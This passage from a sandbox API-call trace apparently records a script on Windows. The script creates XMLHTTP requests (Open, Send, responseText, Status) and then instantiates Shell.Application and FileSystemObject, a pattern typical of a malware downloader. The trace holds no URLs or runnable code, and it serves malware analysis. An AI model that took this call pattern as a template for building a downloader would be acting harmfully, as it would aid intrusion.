	[0749.433] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0749.433] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0749.434] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7280) returned 0x0
	[0749.434] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0749.434] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72e8) returned 0x0
	[0749.434] ??2@YAPEAX_K@Z () returned 0x62f330
	[0749.434] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72e8, pUnkSite=0x62f330) 
	[0749.434] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0749.434] XMLHTTPRequest:IUnknown:Release (This=0x49c72e8) returned 0x0
	[0749.434] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7280) returned 0x0
	[0749.434] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7280) returned 0x3
	[0749.434] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0749.434] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0749.434] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0749.435] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0749.435] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0749.435] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0751.379] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0751.379] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0751.379] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0751.379] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0751.380] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0751.380] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0751.380] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0751.380] SysStringLen (param_1=0x0) returned 0x0
	[0751.380] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0751.380] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0751.380] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0751.380] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0751.380] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0751.380] ??2@YAPEAX_K@Z () returned 0x62f350
	[0751.381] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0751.381] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0751.381] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0751.381] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0751.381] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0751.381] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0751.381] SysStringLen (param_1=0x0) returned 0x0
	[0751.381] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0751.383] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0751.384] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0751.384] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0751.384] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0751.384] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0751.384] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0754.016] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0754.016] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0754.017] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0754.018] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0754.018] SysStringLen (param_1=0x0) returned 0x0
	[0754.018] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0754.018] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0754.018] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7280) returned 0x0
	[0754.018] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0754.018] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0754.018] ??2@YAPEAX_K@Z () returned 0x62f330
	[0754.019] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0754.019] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0754.019] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0754.019] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7280) returned 0x0
	[0754.019] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7280) returned 0x3
	[0754.019] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0754.019] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0754.022] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0754.022] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0754.022] SysStringLen (param_1=0x0) returned 0x0
	[0754.022] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0754.022] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0754.022] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0754.022] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0754.022] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72e8) returned 0x0
	[0754.022] ??2@YAPEAX_K@Z () returned 0x62f310
	[0754.022] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72e8, pUnkSite=0x62f310) 
	[0754.022] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0754.023] XMLHTTPRequest:IUnknown:Release (This=0x49c72e8) returned 0x0
	[0754.023] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0754.023] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0754.023] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0754.023] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0754.023] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0754.023] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0754.023] SysStringLen (param_1=0x0) returned 0x0
	[0754.023] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0754.024] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0754.024] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0754.024] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0754.024] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0754.024] ??2@YAPEAX_K@Z () returned 0x62f330
	[0754.024] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f330) 
	[0754.024] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0754.024] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0754.024] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0754.024] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0754.024] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0754.024] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0754.024] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0754.025] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0754.025] SysStringLen (param_1=0x0) returned 0x0
